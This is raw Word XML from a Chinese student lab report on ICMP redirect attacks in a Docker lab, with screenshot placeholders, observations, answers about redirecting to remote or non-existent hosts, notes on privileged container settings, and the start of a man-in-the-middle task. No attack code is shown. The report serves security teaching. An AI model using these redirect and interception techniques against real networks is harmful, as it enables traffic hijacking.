              <w:t>15. 再次查看路由状态（victim上）：mtr -n 192.168.60.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="24555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4E59566C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5BC5F5">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>路由初始查看：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19F0F979">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4643120" cy="1107440"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="0"/>
                  <wp:docPr id="62679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96203" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4655248" cy="1110287"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="15F47621"/>
          <w:p w14:paraId="71DA2DE3">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第一次编写icmp.py的情况：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364ACDB9">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4650105" cy="1400810"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                  <wp:docPr id="114078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83308" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4654212" cy="1402539"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="261B7300">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4850130" cy="1174750"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
                  <wp:docPr id="2003408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8890" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4857001" cy="1176533"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DDBBF30">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5045710" cy="1137285"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="283033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33235" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5049790" cy="1138118"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB7DBA2"/>
          <w:p w14:paraId="57268776">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第二次修改情况：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E737CAC">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5052695" cy="2346960"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1465191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91857" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5057983" cy="2349350"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="085F29D5">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4879975" cy="681990"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:docPr id="495057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57229" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4888496" cy="683306"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D7502B0">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4669790" cy="1254125"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:docPr id="1294594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94386" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId13"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4674113" cy="1255471"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA87C3C">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5040630" cy="2053590"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
                  <wp:docPr id="49197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75714" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5048131" cy="2056691"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EFC4B18"/>
          <w:p w14:paraId="30F8A488"/>
          <w:p w14:paraId="433100F0">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第三次修改情况：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022D34A9">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4914265" cy="1217295"/>
                  <wp:effectExtent l="0" t="0" r="635" b="1905"/>
                  <wp:docPr id="1111436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6163" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4919808" cy="1218994"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="257FBDFD">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5050790" cy="845820"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2008896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96945" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5060108" cy="847413"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="39704D61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5016500" cy="2032635"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="1849223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23380" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5023211" cy="2035653"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5791AB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4CF9C5E1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果说明：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03614F11">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始情况：显示10.9.0.11和192.168.60.5的路由信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0184F964">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改脚本发送了一个 ICMP 重定向消息，将 victim 的路由指向 10.9.0.111。这种改变在 victim 上表现为路由路径的变化。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B53F4E">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第二次修改并清空缓存后发现没有改变。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F6F13D">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第三次修改并清空缓存后发现没有改变。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DEC7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0A767829">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>问题1</w:t>
            </w:r>
            <w:r>
              <w:t>: Can you use ICMP redirect attacks to redirect to a remote machine? Namely, the IP address assigned to icmp.gw is a computer not on the local LAN. Please show your experiment result, and explain your observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5DA36E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19DAEA38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>答：在尝试将 icmp.py 设置为一个远程机器的 IP 地址（比如 10.9.0.99）后，victim 的路由表没有更新到该远程机器。victim 可能无法将数据包通过这个远程 IP 地址路由，因为该 IP 地址不在同一子网中，也无法通过直接的链路访问。（截图见第一次修改）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B96296B">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>原因：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0501FF9D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ICMP 重定向的限制：ICMP 重定向消息通常只能用于在同一子网内重定向流量。如果目标 IP 地址不在本地子网内，victim 无法通过这个 IP 地址直接发送数据包。因此，ICMP 重定向攻击不能将流量重定向到一个远程机器。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E1DB35">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络隔离：即使 ICMP 消息能够到达 victim，它也不能改变网络层的实际路由，因为目标 IP 不在本地网络中，victim 不会尝试通过这个 IP 地址发送数据包。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="39AEE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61C0BA10">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>问题2：</w:t>
            </w:r>
            <w:r>
              <w:t>Can you use ICMP redirect attacks to redirect to a non-existing machine on the same network? Namely, the IP address assigned to icmp.gw is a local computer that is either offline or non-existing. Please show your experiment result, and explain your observation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="415C9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47646CC1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>答：即使 icmp.py 被设置为一个同一网络上不存在的 IP 地址（比如 192.168.60.100），victim 的路由表可能会更新到这个 IP 地址。然而，victim 会遇到路由不可达的问题，因为数据包无法实际到达一个不存在的机器。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="061A7DE6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>原因：虽然 ICMP 重定向可以将流量重定向到一个无效的 IP 地址，victim 可能会尝试使用这个无效的 IP 地址作为下一跳。然而，由于这个地址上的机器不存在，实际的数据包传输会失败。（截图见第二次修改）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="24684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10839872">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>问题3</w:t>
            </w:r>
            <w:r>
              <w:t>: If you look at the docker-compose.yml file, you will find the following entries for the malicious router container. What are the purposes of these entries? Please change their value to 1, and launch the attack again. Please describe and explain your observation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6674A56C">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4904105" cy="1187450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1261595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95638" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4915297" cy="1190331"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B51E29A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>答：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D0AC00">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改dockerfile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03C10B2D">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5045710" cy="800735"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="11729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90128" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5059802" cy="803501"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2736B5BE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>重启容器：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E27F00">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4894580" cy="1626870"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                  <wp:docPr id="560261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61448" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4898744" cy="1628393"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A987A2">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4816475" cy="1068705"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="133454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4015" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4824649" cy="1071112"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="168B233E">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>重新在attacker运行icmp.py：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552EF340">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5050790" cy="685800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1737580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80400" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5072858" cy="688922"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC466B6"/>
          <w:p w14:paraId="251D4FEA">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在victim上查看路由：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9835AD">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4851400" cy="1315085"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="1278884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84775" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4853751" cy="1315994"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B4C2E0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现还是失败了！</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608341FC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="401598DA">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权解释：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D23A93B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>privileged: true：使容器以特权模式运行，允许容器执行一些通常受限的操作，如修改内核参数、访问所有设备等。特权模式提供了几乎完全的访问权限给容器，使得容器能够进行更低层次的网络操作，如修改路由表、启用 IP 转发等。这对于进行 ICMP 重定向攻击非常重要，因为它需要对网络栈进行较深层次的操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4825FE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cap_add（可选）：添加 Linux 容器的特定能力。允许容器执行特定的网络操作，如配置 IP 路由表或修改网络接口，这对于 ICMP 重定向攻击等需要特权的操作是必要的。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3072A72B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>volumes（可选）：挂载宿主机的目录到容器中，允许在宿主机和容器之间共享文件。对于需要在容器中运行脚本或工具的攻击者。可以在宿主机和容器之间共享代码和数据，便于攻击者在容器内运行攻击代码。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="698FDD41">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>networks（可选）：配置容器的网络设置，包括连接到特定的网络和网络隔离等。决定容器如何与其他容器或网络进行交互，可能影响攻击者与目标之间的网络连接。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498120CD"/>
          <w:p w14:paraId="7517FB0A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>问题回答：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F259B5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>增加特权模式：运行在特权模式下的容器可以进行更多的网络操作，这对于 ICMP 重定向攻击至关重要，因为攻击需要对目标机器的路由进行修改。之前的攻击无法成功执行，增加特权模式提高攻击的成功率，因为容器可以执行必要的系统级操作。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E826713">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB920A9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.2 Task 2: Launching the MITM Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0826EEA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589E4EDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>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0"/>
      </w:tblGrid>
      <w:tr w14:paraId="59988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4C445817">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按要求关闭路由转发功能，完成代码对nc通信双方发起ARP攻击和中间人攻击，观察执行结果并进行说明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F44218">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
